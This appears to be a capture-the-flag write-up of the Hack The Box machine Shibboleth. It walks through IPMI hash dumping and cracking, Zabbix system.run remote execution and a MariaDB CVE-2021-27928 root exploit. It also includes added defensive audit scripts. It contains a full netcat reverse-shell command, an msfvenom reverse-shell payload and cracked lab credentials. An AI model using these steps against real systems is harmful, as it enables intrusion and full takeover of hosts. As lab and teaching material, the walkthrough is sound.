[MEDIUM] Shibboleth


Enumeration

NMAP

Start with an nmap port scan. The following command lists only the open ports:

nmap -p- --min-rate 10000 10.10.11.124 -vvv 2>&1 | grep "Discovered open" | awk '{ print $4 }' | cut -d "/" -f 1


The open ports are then passed to a second nmap scan, this time with service and script detection (banner grabbing).


# Nmap 7.91 scan initiated Tue Mar 15 12:27:25 2022 as: nmap -sV -sC -p 80 -vvv -oA nmap-output-services.tcp 10.10.11.124
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up, received echo-reply ttl 63 (0.35s latency).
Scanned at 2022-03-15 12:27:25 EDT for 15s

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 15 12:27:40 2022 -- 1 IP address (1 host up) scanned in 14.81 seconds


It is unusual for an HTB box, but only one port is open: port 80. Here is what the front page looks like:
[screenshot: Shibboleth front page]
There is nothing here but a simple static page. Next, try guessing virtual hosts; I used ffuf.

VHOST Enumeration

ffuf -u http://shibboleth.htb/ \
    -w <>/Discovery/DNS/subdomains-top1million-110000.txt \
    -H "Host: FUZZ.shibboleth.htb" -o vhosts -fc 302


-fc 302 is added because without it every subdomain sent to the server is answered with a redirect to the main site, so status code 302 has to be filtered out. Once the scan finishes, the result is read from the output file:

jq -r '.results[].host' ffuf/vhost/vhosts


[screenshot: ffuf vhost results]
The output shows three subdomains.

When visited, they all present the same login page:
[screenshot: Shibboleth vhost front page]

UDP Scanning

We don't have any credentials for the login page. Simple admin/password, other common creds, and even the default Zabbix credentials (Admin/zabbix) don't work, so the box needs more enumeration. UDP hasn't been scanned yet.
The following command enumerates UDP:

sudo nmap -sU --min-rate 10000 shibboleth.htb -vvv 


UDP port 623 is open.
[screenshot: UDP 623 open]
Next step is to banner grab it:

sudo nmap -sU -sC --min-rate 10000 -p 623 shibboleth.htb -vvv


[screenshot: nmap result for 623/udp]
Nmap does not show much here, but a lookup of the port identifies it as an IPMI service (623/udp is the standard IPMI/RMCP port). HackTricks also has a great deal of information on how to enumerate and exploit this kind of service.
We can use the Metasploit console and its IPMI modules.

Exploiting IPMI Service

msf6 > use auxiliary/scanner/ipmi/ipmi_version 
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts shibboleth.htb
msf6 auxiliary(scanner/ipmi/ipmi_version) > run


[screenshot: ipmi_version output]
Next, check whether the IPMI service accepts cipher suite 0, which skips authentication entirely:

msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set rhosts shibboleth.htb
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run


[screenshot: ipmi_cipher_zero output]
It is vulnerable. Let's dump the hashes:

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts shibboleth.htb
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run


[screenshot: ipmi_dumphashes output]
Save the hash portion and try cracking it with hashcat:

hashcat -m 7300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt


In hashcat the mode for IPMI2 RAKP HMAC-SHA1 is 7300. The hashes are available at all because the IPMI 2.0 RAKP handshake returns an HMAC keyed with the account's password before the client has authenticated, so the BMC hands offline-crackable material to anyone who can reach port 623.
[screenshot: hashcat result]

Logging In into Zabbix Dashboard

The creds are Administrator:ilovepumkinpie1. We can test these credentials on the vhosts discovered.
[screenshot: Zabbix login]
The creds worked.

Running Script Items in Zabbix Dashboard

According to the Zabbix documentation, an item with the supported key system.run executes a command on the Zabbix agent. To create one, from the home dashboard go to Configuration, then select Hosts.
The Hosts page lists the monitored hosts; in this case there is only one, shibboleth.htb. Click its Items link.
On the upper left there is a Create Item button. Click it.
A form pops up. The Name field can be anything; what matters is the Key. Set it to: system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 9999 >/tmp/f, nowait]. This is a reverse shell; the nowait mode tells the agent to launch the command without waiting for it to finish.
To execute it, select Test, then click Get value and Test. The command should run.
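From the defender's side, the step above only works if the agent accepts system.run items at all. The following script, added here and not part of the original writeup, audits a zabbix_agentd.conf for that: it reads AllowKey/DenyKey rules in file order (Zabbix 5.0+) and falls back to the older EnableRemoteCommands switch, using constructed sample configs. The rule matching is a simplification that treats a pattern as covering system.run when it is * or begins with system.run.

```shell
#!/bin/sh
# Audit a zabbix_agentd.conf: can system.run[...] items (the RCE path used above)
# run on this agent? Added example, not part of the original writeup.
# Prints one word: allowed / denied / unspecified. Exit status 1 when allowed.
zabbix_system_run_policy() {
    conf="$1"
    # Zabbix 5.0+ evaluates AllowKey/DenyKey rules in file order; the first rule
    # matching the key wins. Simplifying assumption: a rule covers system.run if
    # its pattern is "*" or starts with "system.run".
    verdict=$(sed -E -n 's/^[[:space:]]*(AllowKey|DenyKey)=(.*)$/\1 \2/p' "$conf" |
        while read -r rule pattern; do
            case "$pattern" in
                '*'|system.run*)
                    [ "$rule" = AllowKey ] && echo allowed || echo denied
                    break ;;
            esac
        done)
    if [ -z "$verdict" ]; then
        # Pre-5.0 switch, deprecated but still honoured: 1 opens system.run.
        if grep -Eq '^[[:space:]]*EnableRemoteCommands=1' "$conf"; then
            verdict=allowed
        else
            verdict=unspecified   # no explicit rule: check the agent version's default
        fi
    fi
    echo "$verdict"
    [ "$verdict" != allowed ]
}

# Constructed sample configs (not taken from the target), written to a temp dir.
workdir=$(mktemp -d)
cat > "$workdir/weak.conf" <<'EOF'
Server=10.0.0.5
EnableRemoteCommands=1
LogRemoteCommands=1
EOF
cat > "$workdir/hardened.conf" <<'EOF'
Server=10.0.0.5
DenyKey=system.run[*]
AllowKey=vfs.file.contents[/etc/hostname]
EOF
for name in weak hardened; do
    printf '%s: ' "$name"
    zabbix_system_run_policy "$workdir/$name.conf" ||
        echo "  -> fix: DenyKey=system.run[*] (and drop EnableRemoteCommands=1)"
done
```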

Whoami and Privesc to ipmi-svc

After upgrading the shell to an interactive TTY, we can look around. We are running as the zabbix user, but the user target for this box is ipmi-svc.
[screenshot: id as zabbix]
To move to ipmi-svc, try the same password used for the Zabbix dashboard: ipmi-svc:ilovepumkinpie1
[screenshot: id as ipmi-svc]
The password was reused. We have user.

Root Privesc

Zabbix configuration in /etc/zabbix

Checking the environment variables of ipmi-svc, one of them points to a Zabbix config file.
Let's check whether there are other configuration files worth reading in /etc/zabbix.
The last two files look interesting and are readable only by ipmi-svc. One of them holds the MySQL username and password.
Let's try these creds on MySQL: zabbix:bloooarskybluh
Nice, the creds worked. Note that the copyright line in the banner reads 2000, 2018: this MariaDB may be out of date and possibly vulnerable.

Running Processes - Mysql

Running ps -aef --forest shows that the MySQL server is running as root.
[screenshot: ps output]
We have also noted that MySQL may be out of date, so let's check for existing exploits against this version, MariaDB 10.3.25. An exploit procedure exists for it: CVE-2021-27928.
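Two quick host-side checks for the weaknesses this path depends on, added here as an example rather than taken from the writeup: Zabbix config files that carry a database password yet are readable beyond their owner, and a MariaDB/MySQL server process running as root (which is what turns a SUPER-only plugin load into root code execution). Both run against constructed sample data.

```shell
#!/bin/sh
# Host checks for the two conditions this section relies on. Added example, not
# part of the original writeup; the sample files and ps lines are constructed.

# Print "mode owner path" for every *.conf under $1 that sets DBPassword and is
# group- or other-readable. Exit status 1 if any were found.
find_exposed_db_passwords() {
    rc=0
    for f in "$1"/*.conf; do
        [ -f "$f" ] || continue
        grep -Eq '^[[:space:]]*DBPassword=' "$f" || continue
        # symbolic -perm is POSIX find: any group or other read bit set
        if [ -n "$(find "$f" \( -perm -g=r -o -perm -o=r \) -print)" ]; then
            ls -ld "$f" | awk -v p="$f" '{ print $1, $3, p }'
            rc=1
        fi
    done
    return $rc
}

# Read "ps -aef"-style lines on stdin; print those where a mysqld/mariadbd
# process is owned by root. Exit status 1 if any were found.
root_mysqld_processes() {
    awk '$1 == "root" { for (i = 8; i <= NF; i++) {      # fields 8+ are CMD
              n = $i; sub(/.*\//, "", n)                 # strip directory part
              if (n == "mysqld" || n == "mariadbd") { print; found = 1; break }
          } }
         END { exit found ? 1 : 0 }'
}

workdir=$(mktemp -d)
printf 'DBName=zabbix\nDBPassword=constructed-secret\n' > "$workdir/zabbix_server.conf"
chmod 644 "$workdir/zabbix_server.conf"   # world-readable: flagged
printf 'DBPassword=constructed-secret\n' > "$workdir/hardened.conf"
chmod 600 "$workdir/hardened.conf"        # owner only: passes
printf 'Server=10.0.0.5\n' > "$workdir/zabbix_agentd.conf"   # no secret: ignored
find_exposed_db_passwords "$workdir" ||
    echo "-> chmod 600 these files, and never reuse the DB password for OS accounts"

ps_sample='UID        PID  PPID  C STIME TTY          TIME CMD
root       812     1  0 09:00 ?        00:00:00 /usr/sbin/mysqld
mysql      813     1  0 09:00 ?        00:00:00 /usr/sbin/mysqld --user=mysql
zabbix     900     1  0 09:00 ?        00:00:00 /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf'
printf '%s\n' "$ps_sample" | root_mysqld_processes ||
    echo "-> run mysqld as the unprivileged mysql user"
```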

Mysql Exploitation (CVE-2021-27928)

Following the exploitation process, create the .so with msfvenom:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.15 LPORT=10000 -f elf-so -o CVE-2021-27928.so


Now transfer the .so file to the target host; it can be served with Python's http.server. After fetching it, log in to MySQL and set wsrep_provider to the path of the .so file. Since mysqld runs as root, the library is loaded and commands execute as root.
[screenshot: wsrep_provider set and root shell]
The exploit worked! We have pwned the Shibboleth machine.